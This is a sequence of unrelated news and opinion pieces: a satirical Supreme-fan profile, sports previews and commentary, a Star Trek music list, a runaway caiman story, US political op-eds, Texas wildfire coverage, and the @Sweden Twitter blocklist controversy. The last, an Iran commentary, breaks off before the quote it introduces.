Brennan 's love of Supreme has spilled into other facets as well . He spent several thousands of dollars getting a custom paint job on his 1994 Isuzu Trooper to match the red seen in Supreme 's logo . “ It 's like a moving box logo , ” says Brennan .
When Brennan saw a popular “ list ” on lifestyle portal Complex entitled “ 50 Things You Did n't Know About Supreme , ” he got the top 10 items tattooed on his calf . “ I would have gotten all 50 , ” says Brennan . “ But I spent the money needed on art history books to learn about Futura and Jean-Michel Basquiat . ”
My Strange Addiction has tackled notable stories in the past , but Brennan Walter is one of the first to be completely numb to the problems those around him encounter when the hypebeast inside of him runs wild . ”
DES MOINES – The Iowa Barnstormers ( 5-2 ) look for its fourth consecutive win as they take on the Cedar Rapids Titans ( 1-7 ) on Saturday , April 22 , 2017 . Kickoff is set for 7:05 p.m. CDT at the U.S. Cellular Center in Cedar Rapids , Iowa .
Last week , the defense stole the show for the Barnstormers when they picked off the Nebraska Danger five times . Defensive back DaeJohn Love contributed to three of those interceptions , which tied the Iowa Barnstormers single game record . Love now has four interceptions over the last two games . Linebacker Javicz Jones and defensive back Dee Maggitt Jr. hauled in the other two interceptions . Offensively , quarterback Travis Partridge found the end zone five times with four of those coming through the air . Partridge found receiver Ryan Balentine twice in the game with Balentine making an acrobatic catch for a 17 yard score . Running back Rasheed Williams scored three total touchdowns in the game with two coming on the ground .
Last week , the Cedar Rapids Titans fell on the road to the Wichita Falls Nighthawks 81-52 . Quarterback Brion Carnes threw for four touchdowns in the game and running in one touchdown . Receivers Damond Powell and Conner Hollenbeck both caught three touchdowns with Hollenbeck catching two from backup quarterback Marcus Barnett . Defensively , defensive back Tony Grimes had a team-high 10 tackles and also intercepted Nighthawk quarterback Charles McCullum . The Barnstormers are 1-0 against the Titans this season with Iowa winning the game 46-23 during Week 6 .
The Barnstormers will return home on Saturday , April 29 for First Responders Night at Wells Fargo Arena . Tickets to this event are on sale now for just $ 15 with a portion of proceeds benefiting Family Funds at the Des Moines Police Officers Credit Union . The team will be wearing specialty jerseys throughout the game that will be auctioned off for the same cause . Do n't miss out on this great event , call 515-633-2255 or visithttp : //barnstormers.isportstix.com/order/group/first .
The drama of this year 's Super Bowl goes well beyond the field and up the ranks of organized football . As though having the league 's most charismatic team take on its most hated was n't epic enough , the championship match-up is a metaphor for a much larger argument taking place within the NFL .
It 's the crowning game of one of the NFL 's most tumultuous years , with a chain of scandals coming to a head that reveal mass human tragedy inside the league , casting uncertainty on the future of football as a whole . The concussion crisis puts a fine point on the inherent danger of the game , and the league 's ineffective treatment of injured players continues to exacerbate the prescription drug abuse epidemic . In trying to control substance abuse with rigorous drug testing for players , the NFL came under fire for incongruently punishing marijuana users worse than wife-beaters at a time when domestic violence accounts for more than half of all player arrests . The most striking was Josh Gordon 's one-year ban for marijuana , compared to Ray Rice 's two-game suspension for knocking out his fiancee ( although both punishments were subsequently reduced and lengthened respectively ) . And there 's evidence that such violent behavior may stem from repeated concussions . Each finding draws further connections to a common root cause of the NFL 's varied woes — the denial that football is an increasingly unsustainable sport for players ' health .
As the NFL walks the gauntlet of bad press and worse public scrutiny , a growing number of voices point to an obvious singular solution to these problems — medical marijuana . Research shows that cannabis can reduce the severity of concussions and is a safe and non-addictive alternative to opiates for pain management . If the league were ever to allow team doctors to treat players with cannabis , it would mean fewer addictions , fewer brain injuries ( and thereby less violent behavior resulting from brain injuries ) , and of course , no unreasonable penalties for players who choose to use cannabis . Furthermore , it would demonstrate that the NFL prioritizes players ' long-term health over short-term effectiveness . While the NFL has slightly increased the acceptable threshold for marijuana and reduced penalties under their new substance policy , it 's still prohibited and can earn players time in a rehab program , fines , and suspensions . It remains far off from being an accepted medication .
Memory Lane : Super Bowl – in pictures Read more
Despite league policies , NFL players continue self-medicate with cannabis in speculatively large numbers . “ I 'd say , conservatively , that 50 to 60 % of players use cannabis , ” former Vikings punter Chris Kluwe told the Guardian . His estimate echoes Redskins free safety Ryan Clark ( then with the Steelers ) who told ESPN 's First Take that at least half the players in the league use cannabis as an alternative to painkillers . “ Guys look at this as a more natural way to heal themselves , ” Clark said , though he denied using it himself . Former player and current ESPN analyst Lomas Brown made the same estimate in 2012 . As medical and recreational marijuana legalization continue to spread throughout the states , that number is bound to go up .
The NFL hinted at acquiescing on medical marijuana for players a year ago , with commissioner Roger Goodell saying that they 'd follow the guidance of their medical experts if they deemed it an appropriate treatment , but that those experts “ are not saying that right now ” . That statement came after a record year for drug suspensions in the NFL , reaching 29 , nearly three times the previous highest number under Goodell 's tenure since 2006 . At the outset of the 2014 season , NFL spokesman Greg Aiello told this reporter in an email ( in the context of a previous article on this issue ) , “ We 've utilized experts on substance abuse disorders and addiction and we ask them to make recommendations and to date they have n't recommended any change … If the science shows it and there is a rigorous process in place to determine that the only drug that could help is medical marijuana , then we would consider allowing it in necessary cases. ” Four months later , the 2014 season closed with 37 drug-related player suspensions . A week before this year 's Super Bowl , three former players ( and Super Bowl champions ) published an article on Huffington Post calling for the NFL to ease their marijuana policy . Based on the league 's past treatment of the issue , it wo n't elicit a response . If the NFL is to budge on this issue at all , they 'll do so very , very slowly .
And yet the crises rage on . Though there has been a decrease in overall concussions since Frontline began tracking them , a continued increase may be unaccounted for due to under-reporting within the league . With the NFL having just settled a major lawsuit from more than 4,500 former players over handling of concussions , and recently having a lawsuit over pharmaceutical overprescription dismissed by a federal judge , it 's no surprise that the organization is actively downplaying the prevalence of either issue to avoid future cases against them . This has only drawn more attention to the problem . The drug lawsuit prompted a federal investigation by the DEA into team medical practices , which has yet to turn up results . Last month , a Vice report found that several NFL team doctors employed the services of an unlicensed pharmaceutical provider that illegally supplied painkillers and other drugs without officially documenting them . No reprimands have been handed down for such infractions and teams continue to dole pills out to players in order to keep them in play despite what they 're pain is trying to tell them . As Kluwe puts it , “ Team doctors answer to the team , not necessarily to the players . ”
Pete Carroll and baseball 's most feared man : an unlikely tale of friendship Read more
At the center of this issue is the value of a player 's health . As the sport has become more physically punishing , NFL protocol appears to many to preserve a high level of action instead of the athletes engaged in that action . The players are left to fend for themselves against a system that takes their wellbeing for granted , from the NFL 's policymakers to the team staff on the sidelines .
One coach stands apart from the trend . Pete Carroll , head coach of the Seattle Seahawks , employs the unorthodox managerial method of unbridled positivity — prioritizing player safety and team morale , encouraging his men even when they screw up , and fostering respect towards opponents instead of aggression . Thus far with the Seahawks , Carroll 's style has won him a championship , a shot at a second one , and the adoration of players on his team and off . Following last year 's Super Bowl win , an ESPN poll found that 23 % of players surveyed from across the league would like to play for him over any other coach . And his current players openly love him even during the tense period between conference final and championship game .
Along with his progressive views , Carroll has said medical marijuana use should be allowed by the NFL if it benefits players . Before last year 's Super Bowl , Carroll stated , “ Regardless of what other stigmas may be involved , I think we have to do this because the world of medicine is trying to do the exact same thing and figure it out and they 're coming to some conclusions. ” As a winning coach from a state with legalised marijuana , Carroll 's acknowledgement of its medical efficacy is meaningful .
“ I highly doubt that Pete Carroll actively smokes pot , ” Spike Friedman , sports editor for the Seattle Stranger , told the Guardian . “ But in his locker room there is a manner of trying to stay open to the individuals on the team , pushing yoga and meditation … He is the most West Coast football coach you can imagine , or even produce in a lab . ”
Born and raised in San Francisco , a historically progressive American city , Carroll has only seen substantial success as a head coach on the mellow West Coast . After being fired from coaching positions at two East Coast NFL teams — the New York Jets and the New England Patriots — Carroll returned to the college level and made a legendary run as the head of the USC Trojans . His selection as Seahawks head coach came in 2010 and in three seasons he revived the franchise and delivered its first ever championship in 2014 . Now , he 's going for a repeat while fully maintaining the humble principles that he has espoused throughout his career .
Opposing Carroll , on the field and in principle , is Bill Belichick , whose perceived villainy stems from his tough , old school approach , and pulsates with accusations like Spygate , Deflategate , and all forthcoming Gates . Belichick likes to win , and he lacks any fiber of Carroll 's “ nice guy ” routine when it comes to coaching . He also does n't want his players smoking weed , providing the final feature for this year 's Super Bowl to symbolize the battle between a forward-thinking , sustainable NFL and a reckless paradigm that threatens its future .
In a wayward yet compelling way , a win for the Seahawks is a win for weed . And if that 's not enough to win the allegiance of cannabis enthusiasts across the country , they also have a Phish-inspired team chant and a local weed strain named for Marshawn Lynch , which Spike Friedman described as , “ Instantly recognizable as excellent . ”
So many articles have been written about the original Star Trek series ( 1966-1969 ) — from the challenges of getting the series off the ground to Gene Roddenberry 's fervent push to make the cast multicultural to the storylines reflecting the political realities of the 1960s and today . Even the show 's background music and theme song have become embedded in our pop cultural consciousness . But there 's one musical facet too often overlooked : the original lyric-driven tunes featured on the show . It did n't happen frequently and likely only devoted Trekkers will recall them , but these songs from the show 's initial three-year run are definitely worth a re-listen .
1 . “ Oh Charlie ”
Our first tune is from the first-season episode “ Charlie-X ” ( 1966 ) in which the crew encounters a young man ( Robert Walker Jr. ) whose strange powers get out of control . With Uhura on vocals ( Nichelle Nichols , who 'd previously performed for Duke Ellington ! ) and Spock on Vulcan Harp , this song begins as a gentle teasing of Spock 's devilish but attractive features then shifts its attention to Charlie , the aforementioned young man . Problem is , Charlie is a sensitive “ teen ” who uses his power to mute Uhura 's voice and Spock 's lute as a way to show his displeasure . Not a crowd-pleaser .
2 . “ Beyond Antares ”
In “ Conscience of the King , ” Uhura takes up the Vulcan Harp for a rendition of “ Beyond Antares ” to satisfy the request of Lieutenant Riley ( Bruce Hyde ) via intercom . Working alone in engineering , he 's desperate for “ …a love song , something to reassure me I 'm not the only living thing left in the universe. ” Naturally , she obliges , leaving Riley so entranced that he does n't notice someone 's poisoned his military-issued cup-o-milk . The song gets an unexpected encore in the later episode “ The Changeling. ” This time around , the space probe NOMAD decides that Uhura singing the song is illogical and promptly wipes her mind clean . That 's two people seriously injured because of this song . Finally , the tune also appears as a track on the all-but-forgotten Leonard Nimoy Presents Mr. Spock 's Music from Outer Space .
3 . “ The Way to Eden ”
In “ The Way to Eden ” episode of Season 3 , the bare-chested space-hippie Tongo ( Charles Napier ) delivers a folksy tune about how trouble can be avoided if a man tells another man to “ be my friend. ” When he switches his space guitar to church organ mode , his sidekick Mavig ( composer Deborah Downey ) joins in with the sentiment “ let 's say goodbye or let 's say brother. ” Hearing the impromptu concert , crew members file into the Enterprise 's rec room until Tongo ends the song with “ Let 's get together and have some fun / I do n't know how to do it but it 's got to be done ! ”
4 . Spock and Mavig 's Jam Session
During this same “ Eden ” episode , Spock and Mavig jam for an E-major Hendrix-chord instrumental…in the rec room again ! Spock 's back on Vulcan Harp ; Mavig 's playing something that looks like the wire-rims from a 1960s MG midget . The duo pantomimes quite well as the music broadcasts throughout the ship , including the bridge where an exasperated Scotty carps about these young troublemakers making noise . In the song 's defense , the melody has a nice changeup while following a very basic blues progression with some organ backing . Little does the Starfleet know that the hippies ( and the unknowing Spock ) are using the music to subdue key staff while planning to hijack the ship to their desired destination : Planet Eden .
5 . Heading Out to Eden , Yeah Brother
The final song from “ The Way to Eden ” episode features Napier crooning a pleasant ballad about his projected plans on Eden : “ eating all the fruit and throwing away the rind. ” Outside of the promotion of littering , this song proves a pleasant reprise with Napier 's highly reverbed voice and simple acoustic instrumentals evoking calm despite the astro-hippies space mutiny that 's in progress . The trio of songs in “ The Way to Eden ” descend from upbeat to down-tempo which is your melodic clue as to where these spaceniks are headed . Eden is not all it 's cracked up to be .
– Will Wills
PS . For all you Trekkies out there , check out our posts A Season of Change for “ Star Trek : The Next Generation , ” “ For the Love of Spock ” : A Salute to Leonard Nimoy , and The Shatner Album That Is Actually Really Good .
Other Posts You Might Like
It is cruising through the murky waters of an eastern Ontario pond , has eluded capture for weeks and has morphed into an urban legend . Man-eating sea creature ? Experts say it 's probably a caiman , a relative of the alligator that is a greater threat to unsuspecting bugs and frogs than to people and their pets .
This photo of the reptile , believed to be a caiman , was taken last week . ( COURTESY OF RON MAIN )
The chase began three weeks ago , when “ someone called in and said there was an alligator in the pond , ” said Brian T. Foley , police chief of Stirling-Rawdon . Although his first response was “ um , yeah , okay , ” the doubting Foley sent Sgt . James Orr to the town 's Mill Pond anyway . The officer scoured the area , a town 30 minutes northwest of Belleville , for days but found nothing . Word of the caiman quickly spread through the small community and its reputation grew until it became the area 's own sea monster . When local resident Ron Main heard about the myth from his uncle , he was incredulous , but still had to investigate . He saw nothing last Monday . But the next day he saw it : a metre-long spectacled caiman with its head poking out of the water , not too far from the pond 's fountain . His blurry photos could n't convince his friends that the reptile existed . He needed to get close , in daylight , to snap an acceptable photograph .
Article Continued Below
On Friday , Main had a hunch . He crawled , slowly , for 45 minutes to the perfect spot on the edge of the water where the caiman bobbed just a few metres away . “ I got the camera out slow , hoping it did n't go beep , then snapped a picture , ” Main said . Then the caiman went under for 45 minutes , poked back up briefly , sunk back down and vanished into the water . Later that night , Main showed the picture to police , who then contacted the Ministry of Natural Resources . The ministry , unequipped to deal with such reptiles , commissioned Bry Loyst , curator of the Indian River Reptile Zoo , a non-profit organization near Peterborough , to capture the reptile . “ The last ( option ) would be jumping on it like Steve Irwin , the crocodile hunter , ” Loyst said .
He 'll likely use a snare and lasso and , if caught , he 'll house the caiman at his zoo . Loyst said the caiman was likely a pet that the owner got tired of . Loyst was part of a similar search in Hamilton in May 2010 when a bird watcher captured a photograph of an alligator . But that reptile was never seen again .
Article Continued Below
While Foley warned residents their dogs or children could be in danger , an alligator and crocodile scientist said there probably is n't much to worry about . “ A three-foot long gator usually eats frogs , bugs and snails , ” said Frank Mazzotti , a researcher with the University of Florida . “ They would n't eat small birds or rats or mice until it 's about five feet long. ” The caiman would attack only if cornered , Mazzotti said , adding he 's guessing the reptile is at least 3 years old , but could be as old as 6 or 7 . “ An alligator of this size might break the skin and cause some bruising and cuts , but certainly could n't sever a finger or even take down a Chihuahua , ” Mazzotti said . “ The greatest danger is to the animal itself. ” While the cold-blooded species may be able to survive in the pond 's warm , shallow waters , it wo n't survive long when the temperature drops . Caimans will not eat in water temperatures below 18 degrees Celsius and cold temperatures make them lethargic , Mazzotti said .
Fixing Santorum 's 'Google problem '
Via New York Magazine , a Rick Santorum fan is trying to do an end run around the problem with Google that Rick Santorum has , thanks to activist Dan Savage , with a new Facebook page :
Rick Santorum is a God-fearing man who wants to save unborn children and protect traditional marriage . Because of this , radical left-wing activists launched a Google-bombing campaign so that people searching for his name will find pages full of vile , disgusting filth instead .
What we can do as Christians is to fight back with a Google-bombing campaign of our own . We need to post as many links as we can to www.RickSantorum.com ( his real site ) , to help it rise in the search engine ranks and beat the fake sites .
If you have control over any websites , blogs , facebook pages , or anything like that , post a link to www.RickSantorum.com , and help fight back against the gay agenda .
Story Continued Below
So far , there is n't exactly a groundswell on Facebook , but his supporters are doing what they can .
( h/t Dan Hirschhorn )
This article tagged under : Rick Santorum
If imitation is the sincerest form of flattery , then a low-rent Chinese soap firmly establishes Korean TV dramas at the top of entertainment products in the world 's most populous country .
`` The Heirs from the Star , '' a 10-episode Chinese miniseries , has understandably stirred up a plagiarism controversy with its mash-up of two popular Korean soaps , `` The Heirs '' and `` My Love from the Star . ''
It started airing on Chinese drama website iQIYI on Sept. 19 .
Now , the producers have announced they will try and flog the tatty hybrid to Korea .
Chinese media on Monday said the producers have nearly completed the Korean dubbing and hope to sell it to a Korean streaming website .
The series has been widely derided for its shoddy production values , with Chinese viewers describing it as a mash-up of McDonald 's and KFC .
The producers said they still have work to do on the theme tune and are looking for a Kore an singer for it .
Yoo Hyun-bo from HB Entertainment , which produced `` My Love from the Star , '' said , `` We have n't looked at it and we wo n't be fooled by the hype . ''
Nam Sung-hyun at Korea Copyright Commission took a lenient view . `` It 's absurd , but this kind of thing will happen more frequently as exchanges between Korea and China increase , '' he said .
Three sentences .
That 's all it took for first lady Michelle Obama to eviscerate the central theme of Donald Trump 's presidential campaign .
“ Do n't let anyone ever tell you that this country is not great , ” Obama said on the first night of the Democratic National Convention . “ That somehow we need to make it great again . Because this right now is the greatest country on Earth . ”
This was the wife of America 's first black president sharing the wonder of seeing her daughters , “ two beautiful , intelligent black young women , ” playing on the White House lawn . This was a strong , successful woman celebrating , with a parent 's emotion , how her kids , as Hillary Clinton receives the Democratic nomination , will “ now take for granted that a woman can be president of the United States . ”
The question she posed was clear : These realities , this progress — do they not make America great ?
The Democrats gathered in Philadelphia for the Democratic National Convention on July 25 to 28 , 2016 , to officially nominate Hillary Clinton for president .
Without mentioning Trump 's name , without lowering herself to name-calling , the first lady showed us , eloquently and powerfully , that Trump 's campaign strives for an America that was great for some , but not all .
There were no black presidents in Trump 's great America . There were no women with a chance to become president . There were no Latinos in positions of power , no gay couples marrying , no policies that protected the rights of transgender people .
There was no political correctness . No anti-bullying codes . No laws to prevent discrimination in hiring .
Obama 's speech invited Americans to view the return to greatness Trump is promising through her eyes and the eyes of her daughters : “ There but for the grace of God , go I. I want a president who will teach our children that everyone in this country matters . ”
Where was Trump during all this ? In North Carolina , telling a rally of predominantly white people about his plans to bring back the great America they all think existed .
CAPTION Hillary Clinton criticized Donald Trump and spoke about her roots during her acceptance speech at the Democratic National Convention July 28 , 2016 . ( C-SPAN ) Hillary Clinton criticized Donald Trump and spoke about her roots during her acceptance speech at the Democratic National Convention July 28 , 2016 . ( C-SPAN ) CAPTION Khizr Khan , the father of a soldier killed in Iraq , speaks at the Democratic National Convention . Khizr Khan , the father of a soldier killed in Iraq , speaks at the Democratic National Convention .
He was repeatedly calling Sen. Elizabeth Warren , a fierce Trump critic who has said she had Native American ancestors , “ Pocahontas ” and saying : “ She 's got a fresh mouth , other than that she 's got nothing going for her . ”
He was calling Clinton “ a fool ” and saying of America , “ We 're not respected anymore . We have leaders that are stupid . We have leaders that are incompetent . ”
Juxtapose that with the eloquence of Obama 's speech , which brought an end to an awkward day of Democratic division between Clinton supporters and backers of Sen. Bernie Sanders , filling the Philadelphia arena with thunderous applause .
She spoke of how she and her husband help their daughters understand the hateful rhetoric that has bubbled up from people like Trump , who entered the political realm as a birther :
“ That is what Barack and I think about every day as we tried to guide and protect our girls from the challenges of this unusual life and the spotlight . How we urged them to ignore those who question their father 's citizenship or faith . How we insist that the hateful language they hear from public figures on TV does not represent the true spirit of this country . How we explain that when someone is cruel or acts like a bully , you do n't stoop to their level . Our motto is , when they go low , we go high . ”
Trump has only one direction : low . And he 's going low when he promises to make America great again .
Michelle Obama showed us that Monday night .
Here are those sentences again , because they 're worth repeating : “ Do n't let anyone ever tell you that this country is not great . That somehow we need to make it great again . Because this right now is the greatest country on Earth . ”
She continued : “ And as my daughters set out on the world , I want a leader who is worthy of that truth , a leader worthy of my girls ' promise and all of our kids ' promise . A leader who will be guided every day by the love and hope and impossibly big dreams that we all have for our children . ”
All of our children . Not just some .
This was a speech that revealed a truth Americans need to acknowledge .
Make America Great Again is a pithy political slogan . And it 's an affront to anyone whose America is greater now than it ever has been .
rhuppke @ chicagotribune.com
Dialaphone compare the UK 's widest range of networks and retailers to help you find the best mobile phone deals on the cheapest contracts . Our goal is to save you money , by offering free and impartial advice on a huge range of cheap mobile phones , contracts and sim only plans . Our mobile phone comparison tool makes comparing mobile deals and contracts simple .
We know that everyone has different tastes in mobile phones . Some people prefer larger screens , some prefer small devices and others love to have a pen . But no matter what your preferences are , picking out a phone can take an incredibly long time and it 's a drawn-out process that requires a lot of research .
Our goal is to make things simple for our customers by offering fantastic mobile phone deals . Whether you need the latest and greatest smartphone with the most up-to-date technology , or just a simple budget phone that will let you browse the web and call your friends , we 've got some amazing recommendations waiting for you to buy online today .
There is a newer release in this EA Sports franchise . Check out the latest release for all new gameplay features . FIFA 16 innovates across the entire pitch to deliver a balanced , authentic , and exciting football experience that lets you play your way , and compete at a higher level . And with all new ways to play ! With innovative gameplay features , FIFA 16 brings Confidence in Defending , Control in Midfield , and gives you the tools to create more Moments of Magic than ever before . Fans new to the franchise , or skilled players looking to improve their game will have a chance to Compete at a Higher Level using the all new FIFA Trainer . Innovation Across the Entire Pitch . New Ways to Play . Compete at a Higher Level . Play Beautiful in FIFA 16 .
Show More
About 20,000 acres of land are burning in Jeff Davis County from two fires , including one that is no longer considered even partially contained as of Monday night .
The two fires , Livermore Ranch and Spring Mountain , have not combined but are being treated as the same incident , said Patrick Allen , a spokesman with the Texas Forest Service . The Livermore Ranch dropped from 50 percent containment to 0 percent and had burned about 10,400 acres as Monday evening ; Spring Mountain had burned about 10,000 acres and was 60 percent contained . Both had been at about 8,200 acres Monday morning .
Allen said that although the winds have picked up from Sunday , firefighters are still working active flanks on the north and northeast sides of the fire . Allen said a Type 1 Incident Management Team — the highest level of response — arrived Monday afternoon in Fort Davis .
While happening around the same time as the April to May Rock House Fire , that almost 315,000-acre blaze began on a high-wind day , Allen said , with winds exceeding 60 mph . Winds in Jeff Davis County on Monday were only about 20 mph with 30 mph gusts from storms .
“ That was a firestorm type day and a firestorm type fire , ” Allen said of the Rock House Fire , “ and the weather conditions just are n't similar to that today ( Monday ) . ”
However , thunderstorms are believed to have started both fires April 24 , and storms also made it more difficult to attack the Livermore Ranch fire on Monday . Meteorological conditions at work Monday were expected to exist again Tuesday .
CBS 7 Weather Director Craig Stewart explained that warm , dry air from the west would interact with warm , moist air from the east leading to the possibility of thunderstorms in the lower Trans-Pecos in mid-afternoon , which might again hamper firefighter efforts in the area .
According to a Texas Forest Service news release , two Type 2 Incident helicopters , four single-engine air tankers and four heavy air tankers were in the air before storms rolled in . The air support was pulled down from about 3 p.m. to 6 p.m. before the storms left the area , Allen said .
“ It 's in rough country , so not having the ability to have air resources on it makes it more challenging , ” Allen said .
Allen said more resources are set to come in Tuesday bringing ground teams up to five Type 2 bulldozers , 12 Type 6 engines and four hand crews .
County Judge George Grubb said people in the county are somewhat apprehensive , but the practice from last year 's Rock House Fire has prepared them to be ready to help the 100 people displaced from their homes in the evacuation of the Davis Mountain Resort , which has only the Tomahawk Trail road connecting it to Highway 166 .
The fire is about a mile away from the nearest structure at the Davis Mountain Resort and is heading that way , Allen said . He said the fire continues to get closer to the resort area and responders are stepping up evacuations there as they try to protect the homes from the approaching fire .
“ It 's going to be the biggest ( fire ) we 've had this year to this point , ” Allen said . “ It 's not going to be as big as Rock House in any form or fashion . ”
@ OAcourts
FIRE STATUS
Livermore Ranch : 10,346 acres burned after it started April 24 by lightning . The fire is about 50 percent contained as it threatens the Davis Mountain Resort .
Spring Mountain : 9,980 acres burned after it started April 24 by lightning . The fire is about 60 percent contained and does not threaten any structures .
5 P 's OF EVACUATION
People and pets
Papers
Prescriptions
Pictures
Personal computer
Source : Texas Forest Service
A board member of the militia group Oath Keepers told the conspiracy theorist network InfoWars on Saturday that it 's “ guaranteed ” that the United States will enter into a civil war in the next three years .
The Oath Keepers volunteered themselves to provide private security to the anti-Muslim group Act for America 's nationwide “ March for Sharia ” on Saturday ; in an email to members last week , the group said that ACT had reached out to them to “ protect their events . ”
Rob Dew of the Austin-based InfoWars was on the scene of the local march , where he interviewed Oath Keepers board member and Texas chapter president Jay Stang about what Stang insisted were “ paid ” counter-protesters representing a “ totalitarian ” nexus of communism and Islam .
“ Do you think there 's a chance for a civil war in America in the next three years ? ” Dew asked Stang .
“ No , I think it 's guaranteed , ” he responded .
The Southern Poverty Law Center has updates on a number of the ACT protests here .
Former NASCAR driver and current SPEED analyst Kyle Petty shredded the NASCAR penalty process during Sunday 's edition of NASCAR RaceDay .
Here 's the transcript of his comments , which come ahead of Tuesday 's Hendrick Motorsports appeal of the No . 48 team penalties :
You want to talk about a crapshoot . This appeals process is a crapshoot .
There are 45 members on this board . If you go the NASCAR rule book , you 'll see these people 's names . Some of them may have passed away since their names were put in here . That 's how old these people are . These people should n't be judging Jimmie Johnson and Chad Knaus and some of this stuff .
I challenge anybody out there to find me more than eight or 10 out of this 45 who have been to the racetrack in the last 12 to 24 months . These people do n't go to the racetrack , they do n't understand the process . They do n't understand sometimes where this sport is .
They 're great business people . They 're past drivers , champions , past sports car racers , past engine builders . Does n't make any difference . I think they should be judged by their peers . In this environment , in this environment we race in today , if you commit a crime or you do something , you should be judged by people who understand the sport and what is going on .
And I do n't think the appeals process is a good process , but at the same time , I do n't think the fine or what they 've done to Jimmie Johnson and Chad Knaus is anywhere near legit . It 's total BS . They never should have fined them because the car never made it onto the racetrack .
How can ( the appeals panel ) override it ( the penalty ) ? They do n't even understand the sport – look at the names on this list . The ‘ Room of Doom , ' the way these templates fit and everything that goes on ( inspection ) - it 's a complicated process . I 'm not even sure I could judge Chad on it because I do n't go down there and watch them put those templates on that car . I do n't know what the sport is sometimes and how it changes .
I think ( Mike ) Helton is a better judge of it . I think ( John ) Darby is a better judge of it . I think Robin ( Pemberton ) is a better judge of it because they 're right in there , but to take ( the appeals hearing ) out of this context and take it somewhere else , I do n't appreciate that . I do n't like it .
The famously controversial PR account for Sweden on Twitter , is once again grabbing news headlines around the world . And not for winning countless ad awards . In 2012 the curator who ran the account tweeted `` what 's the fuzz with the jews ? '' Now in 2017 the curator pre-emptively blocked the Israeli foreign ministry , the Israeli ambassador to Sweden , many Swedish politicians both in government and local municipalities , many Swedish police officers , journalists and celebrities . Is this progress ? It 's certainly ironic when compared to the other award-winning Sweden campaign `` the Swedish number '' , which celebrated that Sweden 'abolished censorship ' , but was later used by people complaining there 's no freedom of speech in Sweden .
The reason the Swedish Institute has for blocking over 14,000 Twitter accounts - many who never interacted with @ Sweden or even had tweeted at all - was described in the official press release from the Sweden Institute because they were potentially abusive accounts . The list was put in place by last week 's curator Vian Tahir , and the Institute decided to keep it on .
Approximately 12 000 international and Swedish accounts that engage in baiting , threats , hatred and incitement against immigrants , women and LGBTQ-persons , but also against organizations that are committed to human rights . These accounts often have a right-wing extremist and/or a neo-Nazi tendency , and they also incite to violence
They published that statement here with the headline `` SI makes powerful move to protect free speech at @ Sweden . By the way , have I ever told you that Swedes have no concept of irony ? It 's true .
So the press release about this block just called the Israeli ambassador to Sweden a Nazi . I can see the problem here .
Now , that # Israel 's MFA and ambassador are blocked - # Sweden is much safer in reading Iran and others , that were not blocked . @ SweInstitute https : //t.co/C87XzwTikb — Isaac Bachman ( @ isaacbachman ) May 16 , 2017
Due to the piss-poor way this blocklist handled , thought out and how the press release was written , there was an outcry of protests from prominent politicians and pundits including legal pundits , leaving the Swedish Institute no choice but to revert their decision to block and have now unblocked all the people on the list . They 've moved fast enough for no lawsuits to be filed .... yet .
You see , in Sweden , we have several laws that this list could have been violating . For one , all Swedish citizens have the legal right to communicate with all government institutions and read their published statements . The Sweden institute is one . But then , they have `` curators '' who represent them on Twitter , so does it apply here ? Another law that it seems to have more closely violated is `` åsiktsregistrering '' , that 's the registration of people 's personal views . When they added over 14,000 people to a list and labelled the list `` nazis '' that seems to be exactly what they did . We also have a law called PUL , personuppgiftslagen , where you can not make a database with people without informing the people in the database that you are doing so and getting their consent . The blocklist was reported to the police and several prominent pundits have claimed to have consulted with lawyers .
“ Registers of people 's personal views exist in other countries , like Iran , North Korea and Cuba . Or , I should n't say North Korea – over there people are killed directly . But in those countries they have registers of people 's opinions , and exactly as in the case of those registers , it goes without saying that there are many critics and oppositional persons on these lists . But there are also completely innocent people that only by association ended up on the lists ” , says Hanif Bali , Member of Parliament from the Moderate Party , to Nyheter Idag .
Hanif Bali also notes there 's a disconnect in preemptive blocking of `` potentially abusive Twitter accounts '' , being seen as a good thing , but blocking any potentially terrorist migrants from crossing borders is seen as a bad thing . Welcome to 2017 where borders only exist online , Hanif . He continues on Twitter noting : `` So we are able to map and build records of 15,000 `` Nazis '' on Twitter - but we 're unable to keep track of 300 jihadis ? ''
Journalists on the blocklist include Magda Gad , a war correspondent reporting from Syria for Expressen , and Margit Richert who is a culture writer for Svenska Dagbladet . Even The Mayor of Copenhagen can be found on the list , how very un-hygge of @ Sweden . The list that @ Sweden used corresponds to Vian Tahir 's private blocklist to 97.7 % . Member of Parliament Hanif Bali comments : `` This means that the Swedish Institute fibbed when they say that this is some form of professional compilation , instead it seems to be a most subjective list that this snowflake has composed . ''
Vian Tahir states on her twitter page and homepage that she 's an `` Internet safety expert , '' and thanks to the searchable database of the names provided by Nyheter24 we know that Bill Gates is someone who apparently is n't allowed in her personal Twitter safe space . Insert joke about Windows traumatising people here . Exactly how the list was created has not been elaborated on , but looking at the people blocked it seems to have been generated by taking the followers of some chosen accounts , thereby blocking thousands of accounts who never interacted with @ Sweden . Similar to blocklists that gaming companies , Kentucky Fried Chicken and Adland ended up on , the use of which was promoted by the IGDA .
Branding wise , the @ Sweden account seems to survive anything , but Vian Tahir 's personal branding as internet safety expert has been damaged by the fallout of this . The political debate about this will continue for some time , and legally Sweden Institute may have broken the law but this remains to be seen . The speedy removal of the block after it was announced does not revert damage done to our trust in the institute , and potentially has no effect on the legal case .
Pekka Taipale notes that the Swedish Institutes job is to spread `` Swedish culture '' to the world , and with this blocklist they have succeeded . Much like the lauded `` Swedish number '' campaign which proves how naive we all are . Dry sardonic humor , another great Swedish export .
@ davidlinden1 SI : s uppdrag är att sprida svensk kultur , förklara vad Sverige är . # blockgate visar att de har varit mycket framgångsrika ! # thisissweden — Pekka Taipale ( @ ptaipale ) May 16 , 2017
The conventional understanding you get from the media is that Israel is worried that a nuclear-armed Iran would pose a serious threat to the country 's existence .
Is that really what 's happening , though ? Another interpretation is that Iran might want nuclear weapons not to launch any such an attack but to prevent an attack on its country–nuclear deterrence , in other words . ( Of course , it 's important to note that there is currently no evidence that Iran is pursuing a weapons program . )
I was struck when I heard Israeli journalist Ronen Bergman bring up some of these ideas on NPR ‘ s Talk of the Nation on January 30 . Bergman is no outsider critic of Israeli policy ; when he appeared recently on the NewsHour ( 1/12/12 ) and was asked about the assassination of Iranian scientists , his answer was : “ I do n't know . And even if I knew , I would tell you that I do n't know . ”
Here 's what he said on NPR , appearing to talk about his New York Times magazine piece on Israel and Iran :
